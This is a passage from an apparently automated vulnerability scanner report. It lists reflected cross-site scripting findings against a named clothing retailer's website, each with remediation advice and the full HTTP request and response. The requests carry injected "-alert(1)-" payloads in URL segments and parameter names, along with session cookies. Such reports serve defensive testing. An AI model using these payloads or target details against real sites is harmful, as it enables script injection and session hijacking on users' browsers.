<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Track J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1");
//]]>
...[SNIP]...

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32758"-alert(1)-"88339fcc816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men32758"-alert(1)-"88339fcc816/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=agnd4mrumvubq89l712rq44e55; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men32758"-alert(1)-"88339fcc816/trousers/");
//]]>
...[SNIP]...

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ae"-alert(1)-"0f8046e452d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers641ae"-alert(1)-"0f8046e452d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tm365jrdhtskqa9asf90no4sp0; expires=Tue, 09-Nov-2010 17:02:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers641ae"-alert(1)-"0f8046e452d/");
//]]>
...[SNIP]...

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c177f"-alert(1)-"7e003bc6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers/?c177f"-alert(1)-"7e003bc6dd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9igs671tvn9lchq7565js7dvv2; expires=Tue, 09-Nov-2010 17:00:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers/?c177f"-alert(1)-"7e003bc6dd=1");
//]]>
...[SNIP]...

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70388"-alert(1)-"5b48da15cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men70388"-alert(1)-"5b48da15cf0/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=be02l2afv72o2hgpi89r2t6k21; expires=Tue, 09-Nov-2010 17:02:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men70388"-alert(1)-"5b48da15cf0/woven-shirts/");
//]]>
...[SNIP]...

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57173"-alert(1)-"36554d3b526 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts57173"-alert(1)-"36554d3b526/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ielk38p1cdvnm9vrm5hl46edf1; expires=Tue, 09-Nov-2010 17:02:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts57173"-alert(1)-"36554d3b526/");
//]]>
...[SNIP]...

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8afd8"-alert(1)-"8bd75d8fddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1fpmi78oovkincf8akrcqp2i1; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1");
//]]>
...[SNIP]...

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c55"-alert(1)-"c7ef5670682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4dk5d5fdmk3eqt52kduntndmk1; expires=Tue, 09-Nov-2010 17:24:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/");
//]]>
...[SNIP]...

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5c47"-alert(1)-"0dd4d3a7fb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9bdq06ni08c4g2tn7li98can80; expires=Tue, 09-Nov-2010 17:24:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/");
//]]>
...[SNIP]...

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 935de"-alert(1)-"65c96b3a2a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uv4c754ce5o9idhmmcc9egapj7; expires=Tue, 09-Nov-2010 17:23:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Clothin
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1");
//]]>
...[SNIP]...

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8766a"-alert(1)-"5e40dafcba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1a2987226st1p04jpl19bp5o7; expires=Tue, 09-Nov-2010 17:20:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/");
//]]>
...[SNIP]...

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65d7"-alert(1)-"854115540de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizese65d7"-alert(1)-"854115540de/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lb7d9b5603smg4kjol3qn871u6; expires=Tue, 09-Nov-2010 17:20:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizese65d7"-alert(1)-"854115540de/");
//]]>
...[SNIP]...

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb3f0"-alert(1)-"7841aac267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jvt7334pjhmribj6rldhpgtti0; expires=Tue, 09-Nov-2010 17:19:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1");
//]]>
...[SNIP]...

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bd1"-alert(1)-"d86befb387e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sl5ve9h94p1gn2rpouag2sh9s7; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/");
//]]>
...[SNIP]...

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cd0"-alert(1)-"28805937ef9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
